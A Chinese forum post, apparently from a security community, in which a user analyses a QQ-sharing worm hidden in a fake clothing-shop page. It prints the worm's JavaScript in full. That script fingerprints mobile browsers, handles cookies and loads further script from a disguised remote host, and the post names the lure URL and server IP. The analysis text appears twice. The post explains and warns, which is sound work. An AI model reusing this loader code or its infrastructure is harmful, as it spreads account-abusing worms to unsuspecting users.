-
-
[旧帖] [原创]一个简单QQ分享蠕虫病毒分析. 0.00雪花
-
发表于: 2015-8-19 14:24
-
最近空间有家内裤好像卖的很火.看到朋友分析,怀着看笑话的心情评论一句,没想到自己也中招了,还被别人看了笑话,身为一个典型的IT男,表示不服,然后就开始打开网站进行分析.(好像还有个优衣库的版本)
目标网站地址: http ://davlpqprk.kzgfnp.gymm.pw/view/3/?id = 1,00.2871026 (手机用户请勿访问,电脑用户随便访问)
既然分享的时候 QQ不会提示你异地登陆过,所以肯定就是网站里面有木马用来记录你当前的 Cookies信息,然后在直接进行授权分享.大致看了一下网站源代码.. 好像并没有什么重要的信息,本来想从分享时候附赠的表情代码入手,不过好像代码都是随机的.....
那就说明很简单的事情,木马被隐藏在网站链接中, 前面3个都是CSS样式,基本直接Pass,到下面 就会发现有段Js的地址。
<script>var sd_i=134;</script>
<script src="http://www.baidu.com.glzhd.com:9781/b/c.js" charset="gb2312"></script>
首先定义了 一个存放ID的变量,然后执行到下面Js地址.打开Js地址后 好像就很明白了.直接贴上代码加注释
var s_reffer;try{s_reffer=window.top.document.referrer;}catch(e){s_reffer=document.referrer;}
s_reffer = escape(s_reffer);
function get_c_b(Name)
{ var search = Name + "=" ;var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search);if (offset != -1) {offset += search.length ;end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length;returnvalue=unescape(document.cookie.substring(offset, end)) ;} } return returnvalue; }
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion; //navigator.userAgent 判断浏览器类型 navigator.appVersion判断浏览器版本和平台信息
return {
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //返回IOS版本
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, // 返回Android版本
iPhone: u.indexOf('iPhone') > -1, // 返回iphone版本
iPad: u.indexOf('iPad') > -1 // 返回Ipad 版本 因此电脑访问不会中招
}}()
}
var khdlx=0;
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {khdlx=2}else{
if(browser.versions.android){khdlx=1} //根据返回访问版本的信息 进行变量赋值 以便下面进行网站填写参数
}//if(sd_i==43){khdlx=2;}
var pWG_=pWG_+1||1;
if(pWG_==1){if(get_c_b("C_P_i")==""){var Bi=1;var Bv=1;expires = new Date();
expires.setTime(expires.getTime()+600*60*1000) ; // 设置这个对象所表示的日期时间 大致就是获取信息后间隔多少秒进行转发
document.cookie = "C_P_i='1';expires="+expires.toGMTString() + "; path=/;domain="+location.hostname+"";}else{var Bi=0;var Bv=1;} //记录保存你当前手机版本平台的Cookies信息
}
else{var Bi=0;var Bv=0;}
var mw = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth; //获取浏览器可见区域的宽度
var mh = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;//获取浏览器可见区域的高度
if(mw>mh){mh2=mh;mh=mw;mw=mh2;}
//if(mw>580){mw=580}
mh=parseInt(3*mw/20);
document.write ('<script src="http://www.baidu.com.glzhd.com:9781/code/'+sd_i+'.asp?Bi='+Bi+'&Bv='+Bv+'&khd='+khdlx+'" language=javascript charset="gb2312"></script>');
//在你浏览器页面载入过程中用实时脚本创建页面内容 , 也就是主要分享的内容
/*mb*/
//设定时间去分享信息
function mbwh(){var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
//if(w>580){w=580}
if(document.getElementById("biGi")){mbwh3(w);}else{setTimeout(mbwh,1000);}
}
function mbwh2(){mbwh();
var evt = "onorientationchange" in window ? "orientationchange" : "resize";
window.addEventListener(evt,function(obj){
setTimeout(mbwh,500);
})
}
function mbwh3(w){
biGii=document.getElementById("biGi");
biGiihe=parseInt(3*w/20);
if(document.getElementById("spbd")){document.getElementById("spbd").style.paddingTop=40+"px";}
}
//----------------------------------------------------------------------------------------------------------------------------------------------------
可见网站的访问地址是 www.baidu.com.glzhd.com .主站地址 www.glzhd.com..为了怕腾讯警告是危险网站,特意设置了前缀是baidu.com的三级子域名,, 不过好像没什么用 -.-
http://www.baidu.com.glzhd.com/ 网站好像看来是无法访问,但是可以Ping通,然后随在里面填写参数进去,
110.80.135.105 ==>> 1850771305 ==>> 福建省福州市 电信 (站长果然机智,能隐藏的全部都隐藏...看来也是怕出事..... )
http://www.baidu.com.glzhd.com:9781/code/134.asp?Bi=1&Bv=1&khd=2 会发现提示 Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配: 'mh' ,参数填写的话 要用Iphone或者Androdi系统进行提交, 所以懒得测试,
网站后面居然还有CNZZ的统计,这不是作死嘛, 不过好像加了隐藏代码,有固定的id,还有CNDZZ的统计,看来是转发给钱的啊~
如果你不小心访问了网站,分享了改网址,完全没必要怕,因为你QQ根本不会被盗,,他直接简单的获取你访问的平台版本 ,然后记录你当前访问的Cookies,再利用腾讯公开分享的接口 让你自动分享该内容...直接删除分享内容就好了,没事不要太信任好友分享的网站,,不要去点击就好了..
其实腾讯可以完全很容易解决这个,分享时直接加验证码就可以了吧,
本人菜鸟,大神勿喷~谢谢~
目标网站地址: http ://davlpqprk.kzgfnp.gymm.pw/view/3/?id = 1,00.2871026 (手机用户请勿访问,电脑用户随便访问)
既然分享的时候 QQ不会提示你异地登陆过,所以肯定就是网站里面有木马用来记录你当前的 Cookies信息,然后在直接进行授权分享.大致看了一下网站源代码.. 好像并没有什么重要的信息,本来想从分享时候附赠的表情代码入手,不过好像代码都是随机的.....
那就说明很简单的事情,木马被隐藏在网站链接中, 前面3个都是CSS样式,基本直接Pass,到下面 就会发现有段Js的地址。
<script>var sd_i=134;</script>
<script src="http://www.baidu.com.glzhd.com:9781/b/c.js" charset="gb2312"></script>
首先定义了 一个存放ID的变量,然后执行到下面Js地址.打开Js地址后 好像就很明白了.直接贴上代码加注释
var s_reffer;try{s_reffer=window.top.document.referrer;}catch(e){s_reffer=document.referrer;}
s_reffer = escape(s_reffer);
function get_c_b(Name)
{ var search = Name + "=" ;var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search);if (offset != -1) {offset += search.length ;end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length;returnvalue=unescape(document.cookie.substring(offset, end)) ;} } return returnvalue; }
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion; //navigator.userAgent 判断浏览器类型 navigator.appVersion判断浏览器版本和平台信息
return {
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //返回IOS版本
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, // 返回Android版本
iPhone: u.indexOf('iPhone') > -1, // 返回iphone版本
iPad: u.indexOf('iPad') > -1 // 返回Ipad 版本 因此电脑访问不会中招
}}()
}
var khdlx=0;
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {khdlx=2}else{
if(browser.versions.android){khdlx=1} //根据返回访问版本的信息 进行变量赋值 以便下面进行网站填写参数
}//if(sd_i==43){khdlx=2;}
var pWG_=pWG_+1||1;
if(pWG_==1){if(get_c_b("C_P_i")==""){var Bi=1;var Bv=1;expires = new Date();
expires.setTime(expires.getTime()+600*60*1000) ; // 设置这个对象所表示的日期时间 大致就是获取信息后间隔多少秒进行转发
document.cookie = "C_P_i='1';expires="+expires.toGMTString() + "; path=/;domain="+location.hostname+"";}else{var Bi=0;var Bv=1;} //记录保存你当前手机版本平台的Cookies信息
}
else{var Bi=0;var Bv=0;}
var mw = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth; //获取浏览器可见区域的宽度
var mh = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;//获取浏览器可见区域的高度
if(mw>mh){mh2=mh;mh=mw;mw=mh2;}
//if(mw>580){mw=580}
mh=parseInt(3*mw/20);
document.write ('<script src="http://www.baidu.com.glzhd.com:9781/code/'+sd_i+'.asp?Bi='+Bi+'&Bv='+Bv+'&khd='+khdlx+'" language=javascript charset="gb2312"></script>');
//在你浏览器页面载入过程中用实时脚本创建页面内容 , 也就是主要分享的内容
/*mb*/
//设定时间去分享信息
function mbwh(){var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
//if(w>580){w=580}
if(document.getElementById("biGi")){mbwh3(w);}else{setTimeout(mbwh,1000);}
}
function mbwh2(){mbwh();
var evt = "onorientationchange" in window ? "orientationchange" : "resize";
window.addEventListener(evt,function(obj){
setTimeout(mbwh,500);
})
}
function mbwh3(w){
biGii=document.getElementById("biGi");
biGiihe=parseInt(3*w/20);
if(document.getElementById("spbd")){document.getElementById("spbd").style.paddingTop=40+"px";}
}
//----------------------------------------------------------------------------------------------------------------------------------------------------
可见网站的访问地址是 www.baidu.com.glzhd.com .主站地址 www.glzhd.com..为了怕腾讯警告是危险网站,特意设置了前缀是baidu.com的三级子域名,, 不过好像没什么用 -.-
http://www.baidu.com.glzhd.com/ 网站好像看来是无法访问,但是可以Ping通,然后随在里面填写参数进去,
110.80.135.105 ==>> 1850771305 ==>> 福建省福州市 电信 (站长果然机智,能隐藏的全部都隐藏...看来也是怕出事..... )
http://www.baidu.com.glzhd.com:9781/code/134.asp?Bi=1&Bv=1&khd=2 会发现提示 Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配: 'mh' ,参数填写的话 要用Iphone或者Androdi系统进行提交, 所以懒得测试,
网站后面居然还有CNZZ的统计,这不是作死嘛, 不过好像加了隐藏代码,有固定的id,还有CNDZZ的统计,看来是转发给钱的啊~
如果你不小心访问了网站,分享了改网址,完全没必要怕,因为你QQ根本不会被盗,,他直接简单的获取你访问的平台版本 ,然后记录你当前访问的Cookies,再利用腾讯公开分享的接口 让你自动分享该内容...直接删除分享内容就好了,没事不要太信任好友分享的网站,,不要去点击就好了..
其实腾讯可以完全很容易解决这个,分享时直接加验证码就可以了吧,
本人菜鸟,大神勿喷~谢谢~
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
学习学习...
|
|
|
|
|
|
|
|
|
可以啊~
|
|
|
|
|
|
|
